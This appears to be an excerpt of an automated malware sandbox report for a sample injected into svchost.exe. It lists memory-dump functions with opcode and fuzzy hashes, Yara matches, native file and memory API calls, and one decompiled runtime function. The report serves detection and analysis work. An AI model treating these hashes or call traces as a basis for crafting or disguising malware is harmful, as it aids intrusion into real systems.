                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7cd69adf77bc9cabdef8d23e9bd85a65674884efbb0b2b6a486df81302315794
                                      • Instruction ID: 7dc031080e3eb84ba09e24a8b28c7b7a644c80c8dad3321dc3b6dd889b183b10
                                      • Opcode Fuzzy Hash: 7cd69adf77bc9cabdef8d23e9bd85a65674884efbb0b2b6a486df81302315794
                                      • Instruction Fuzzy Hash: 6ED05E721610016BCB2F6B549958B25361AF7C4760F78480DF21F4B9A4EE68A8E9D2C8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019A16E0, Relevance: .0, Instructions: 17COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 702bd7c319f4f671ea681017242b33ecd1a891a34abaabb317e273540fca69de
                                      • Instruction ID: a40a13aaa1527ee8b7d136d0a064edc58e9198a740cfbb330a9a4f2bc60ca400
                                      • Opcode Fuzzy Hash: 702bd7c319f4f671ea681017242b33ecd1a891a34abaabb317e273540fca69de
                                      • Instruction Fuzzy Hash: 67D0A77114010192EE2D5B189804B142659EBD0786F78007CF20F894D0CFA4CC96E0CC
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019F53CA, Relevance: .0, Instructions: 16COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                      • Instruction ID: f2136fdcfb65c9a874d1b1e3bb12f05886f05326b84042b1b26b4b0b9743e63e
                                      • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                      • Instruction Fuzzy Hash: C0E08C31910680EBDF16EB8DCA50F4EBBF9FB84B00F160408A10C5B621C664AC00CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00407B02, Relevance: .0, Instructions: 14COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0ada9e6544b9b706c5c465dae02bedae9cb874bb8780141ee25815b94d26e53d
                                      • Instruction ID: 9241c78dd6bc690e314f4247ed097c2cacee772f5339836f8ef43891499d0e7d
                                      • Opcode Fuzzy Hash: 0ada9e6544b9b706c5c465dae02bedae9cb874bb8780141ee25815b94d26e53d
                                      • Instruction Fuzzy Hash: 7BC04C32E151044AD6248E4DB442375F3B4DB57624F0022A7EC04A75559156D461458D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0198AAB0, Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                      • Instruction ID: eb634bc0d34cc1875bdea7aa708c0568a202d88ac8e2c50670e15c92289a42e6
                                      • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                      • Instruction Fuzzy Hash: B8D0C935352980CFD617CB0CC554B0573A8BB04B41FC50490E504CBB22E62CD940CA00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019A35A1, Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                      • Instruction ID: 67a74c04e29ff4e61b09d987b7ce808655dbaeefaf3697436ec920146cdb10b4
                                      • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                      • Instruction Fuzzy Hash: F4D0A9318011819AEB02AF1CC22CB683BB6BB00209FD83065808E06852E33A4B0EC680
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0197DB40, Relevance: .0, Instructions: 11COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                      • Instruction ID: 645ee7b6dcb00de8dc57ecd8368db9a3239a1b928738a5f4f43990ab03136813
                                      • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                      • Instruction Fuzzy Hash: 5EC08C70280A01AAEB221F24CE01B103BA4BF50B06F8800A06305DA0F0DB78D802E600
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019FA537, Relevance: .0, Instructions: 11COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                      • Instruction ID: 7afe51ce085cb3cb6345a4b72b88b06f8b41abcff7d343f9a982f07b82a61939
                                      • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                      • Instruction Fuzzy Hash: 51C01232080248BBCB126E85CC00F067B2AEBA4B60F008014BA080A5608632E9B0EA84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01993A1C, Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                      • Instruction ID: 06e1e9dcd581bd4793739da8621bb27cf7447fcb99acbe8df1e1f7c6221a2608
                                      • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                      • Instruction Fuzzy Hash: C1C04C72180648BBCB126E45DD01F157B69E7A4B60F154021B6084B5618576ED61D598
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0197AD30, Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                      • Instruction ID: 9c7a102a2500f1f7fbff81d7598f0ca219b81e19b4e48b7bc99e8a758eae511d
                                      • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                      • Instruction Fuzzy Hash: C7C08C32080248BBCB126A89CD00F057B29E7A0B60F000020B6080A6618932E860D988
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019A36CC, Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                      • Instruction ID: 4d4fbda9bb709689d7e79502fd4c75541d9d983dc8538fa8b89d126e10a6d7bb
                                      • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                      • Instruction Fuzzy Hash: 6EC02BB0150440FBDB161F34CE01F147258F740A26FB403547224864F0D5289C00D140
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019876E2, Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                      • Instruction ID: 26bb6b3cd30eae38b0805ae74e556d4b4b811a945de0181624954db40626e9ee
                                      • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                      • Instruction Fuzzy Hash: 89C08C721551805AEF2E678CCE20B243A58AB0860EF68099CAA09094A2C368A802C608
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01997D50, Relevance: .0, Instructions: 7COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                      • Instruction ID: a08f0831db6037d542ca00fca96d5fc89127c060a0f425463b6bab8b116fab89
                                      • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                      • Instruction Fuzzy Hash: CEB092353119408FCF1ADF1CC080B1533E8BB44A40B8400D0E404CBA21D229E8009900
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019A2ACB, Relevance: .0, Instructions: 5COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                      • Instruction ID: 8eb8fa9690be0c8be80da1e8845c8e29f9159d43390d12b41a7a421f9fb7d33f
                                      • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                      • Instruction Fuzzy Hash: DAB01232C10441CFCF02FF40CA20B197331FB40750F054490900227930C228AC01CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01A0FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 53%
                                      			E01A0FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E019BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01A05720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01A05720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                      0x01a0fdda
                                      0x01a0fde2
                                      0x01a0fde5
                                      0x01a0fdec
                                      0x01a0fdfa
                                      0x01a0fdff
                                      0x01a0fe0a
                                      0x01a0fe0f
                                      0x01a0fe17
                                      0x01a0fe1e
                                      0x01a0fe19
                                      0x01a0fe19
                                      0x01a0fe19
                                      0x01a0fe20
                                      0x01a0fe21
                                      0x01a0fe22
                                      0x01a0fe25
                                      0x01a0fe40

                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A0FDFA
                                      Strings
                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A0FE01
                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A0FE2B
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                      • API String ID: 885266447-3903918235
                                      • Opcode ID: 070f1dfb2dbbbaed48c9d93afb91c867d38997e4ce22f87a45c60b3de058f919
                                      • Instruction ID: 7d0d3f57398c37363dbd0cf46a19789256f524571c1e242210248bc793849d66
                                      • Opcode Fuzzy Hash: 070f1dfb2dbbbaed48c9d93afb91c867d38997e4ce22f87a45c60b3de058f919
                                      • Instruction Fuzzy Hash: CDF0F672600201BFEA211B55ED06F23BF6AEB84B30F140314F628565D1DA62FC2096F0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Analysis Process: svchost.exe PID: 5392 Parent PID: 3388 svchost.exeCOMMON

                                      Executed Functions

                                      Function 00369D5A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00364B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00364B87,007A002E,00000000,00000060,00000000,00000000), ref: 00369DAD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: 97a584bf2f05d31048d147a0b2589ffddc14c088bcb75b2fa52647235a9a1a48
                                      • Instruction ID: acd34092a79f6a0815e61578239e0f8c90806d50e5ef5e5d6d75296ce45b8c8a
                                      • Opcode Fuzzy Hash: 97a584bf2f05d31048d147a0b2589ffddc14c088bcb75b2fa52647235a9a1a48
                                      • Instruction Fuzzy Hash: E301A8B2200108AFDB04CF98DC85EDB77A9EF8C754F158248FA0DD7240D630E811CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00369D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00364B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00364B87,007A002E,00000000,00000060,00000000,00000000), ref: 00369DAD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction ID: 4b8464be7760e66db170ffe9e3b64c26632ae198db77c04f3ae49164f005a1d1
                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction Fuzzy Hash: 82F0B6B2200108ABCB08CF88DC85DEB77EDAF8C754F158248BA0D97241C630E8118BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00369DB2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00364B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00364B87,007A002E,00000000,00000060,00000000,00000000), ref: 00369DAD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: e4a45a0148bfff756c8a5383a238794a8f00c363e748108148ed18c5256569a3
                                      • Instruction ID: 2ab5576ed931d5df2842ba12957b3a0ac71a95a256cd731c8d59bd32ffabee4f
                                      • Opcode Fuzzy Hash: e4a45a0148bfff756c8a5383a238794a8f00c363e748108148ed18c5256569a3
                                      • Instruction Fuzzy Hash: E0E012B3304908AB8B08CF98EC95DEB73ADEFCC210B00861DFA19C7200C631E8118BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00369E8B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtClose.NTDLL( M6,?,?,00364D20,00000000,FFFFFFFF), ref: 00369EB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID: M6
                                      • API String ID: 3535843008-1298217763
                                      • Opcode ID: 5968319f11dc53bb5869aa269df621ee45a92c3c5676f3609cba4dd2b88c62e0
                                      • Instruction ID: 894f1749607fba50d2613d3816d21eac7b75f42dfe632ef4fc0a67d12623d2d2
                                      • Opcode Fuzzy Hash: 5968319f11dc53bb5869aa269df621ee45a92c3c5676f3609cba4dd2b88c62e0
                                      • Instruction Fuzzy Hash: E8E0C2312405086BE710DFA4CC84EE77B99EF48351F118659F90CEB282C630E9008A90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00369E90, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtClose.NTDLL( M6,?,?,00364D20,00000000,FFFFFFFF), ref: 00369EB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID: M6
                                      • API String ID: 3535843008-1298217763
                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction ID: ea4199559e7c903f8605ba8592f24d46effb8ce6c0fa9811d710b50d5e506a69
                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction Fuzzy Hash: A2D012752002186BD710EB98CC85E97779CEF44750F158455BA586B242C530F51086E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00369F3C, Relevance: 1.6, APIs: 1, Instructions: 50memorynativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00352D11,00002000,00003000,00000004), ref: 00369F79
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: e2687890f02f8406ba2493de24c9ec431ec66bb2d791c4403511851454ca64cb
                                      • Instruction ID: 123ed151c4e6add12712950a19a83b24f383b7444fab7fa8fda9036ff203a8b0
                                      • Opcode Fuzzy Hash: e2687890f02f8406ba2493de24c9ec431ec66bb2d791c4403511851454ca64cb
                                      • Instruction Fuzzy Hash: FF011AB5200209AFDB14DF98DC81DAB73ADEF88710F118519FE0897241C630E820CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00369E0A, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,00364A01,?,?,?,?,00364A01,FFFFFFFF,?,BM6,?,00000000), ref: 00369E55
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 8186451b5bad31741b9d3260ab9961abe979ddf5b0eb9e6e9b814f12b883559a
                                      • Instruction ID: c1530e18412666385acd86cc124141bc565a458ce28b74365c90a88aa722fc35
                                      • Opcode Fuzzy Hash: 8186451b5bad31741b9d3260ab9961abe979ddf5b0eb9e6e9b814f12b883559a
                                      • Instruction Fuzzy Hash: 23F0F9B2210108AFCB18DF98CC80DEB77A9EF8C754F118258BE1DA7245C630E811CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00369E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,00364A01,?,?,?,?,00364A01,FFFFFFFF,?,BM6,?,00000000), ref: 00369E55
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction ID: ee433bf596fc48bed4f7a7d33ce62590b3fc7a22189d214d9bb13e387634107e
                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC81EEB77ADEF8C754F158248BA1DA7241D630E8118BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00369F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00352D11,00002000,00003000,00000004), ref: 00369F79
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                      • Instruction ID: 0ae160f09e8315d0003ff3a3940742436edc3f1e104bd49ea4c76d5fdf42e8ec
                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                      • Instruction Fuzzy Hash: 7DF015B2200208ABDB14DF89CC81EAB77ADEF88750F118148BE08A7241C630F810CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 031A9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 7086a7d0137b33900c69d61dcb87808eae0585ee0bdebb4af4bb439d50319dcf
                                      • Instruction ID: 0fce5c09812caac4675363f96ccf2ec172a9980f1292668d3a2f5928e6fea9bb
                                      • Opcode Fuzzy Hash: 7086a7d0137b33900c69d61dcb87808eae0585ee0bdebb4af4bb439d50319dcf
                                      • Instruction Fuzzy Hash: 8A90026121184443D244A9695D14B470015D7D4343F51C129E0145554CCB5598616561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 031A9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 9d1a4355f74a93a93a77bfc4970afd9ecdc905e6d9cf880231ad592a0c5540cd
                                      • Instruction ID: 42a361c86c8a1886d5941211dbcf298f0de9ccb91f9ec5137c3c7818cb1ab262
                                      • Opcode Fuzzy Hash: 9d1a4355f74a93a93a77bfc4970afd9ecdc905e6d9cf880231ad592a0c5540cd
                                      • Instruction Fuzzy Hash: C19002B120104803D184B55955047860015D7D4341F51C025E5055554EC7999DD576A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 031A99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 824cb3a0cca2bb4701360febbb5f650e3ada344e726b8b855a5d5168b8914ec5
                                      • Instruction ID: f4afdcb2baab09b15543a5e104bd3e67a4f74fc0e22fde81bb9368ee7b244abc
                                      • Opcode Fuzzy Hash: 824cb3a0cca2bb4701360febbb5f650e3ada344e726b8b855a5d5168b8914ec5
                                      • Instruction Fuzzy Hash: E09002A134104843D144A5595514B460015D7E5341F51C029E1055554DC759DC527166
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 031A9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: af39fa7aec2988375c73dd474cabc247aa95513a668ec662f5669205adc45c9b
                                      • Instruction ID: 421ce48f40ad8fada3e3ccc31c42136bd388ff0ac9ec12ff34e035d9825e1d9c
                                      • Opcode Fuzzy Hash: af39fa7aec2988375c73dd474cabc247aa95513a668ec662f5669205adc45c9b
                                      • Instruction Fuzzy Hash: 9D900261242085539589F55955045474016E7E4281791C026E1405950CC766A856E661
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 031A9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: d54ee4f8c820a00bdac21fc6ec96daf164a28daff8a954be7e8c58d5ff6332e8
                                      • Instruction ID: 67137494528a995043eea13f7fed12454e4768c8bedcca17e02ea5569ce72d55
                                      • Opcode Fuzzy Hash: d54ee4f8c820a00bdac21fc6ec96daf164a28daff8a954be7e8c58d5ff6332e8
                                      • Instruction Fuzzy Hash: F090027120104813D155A55956047470019D7D4281F91C426E0415558DD7969952B161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 031A9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp Download File
                                      Similarity
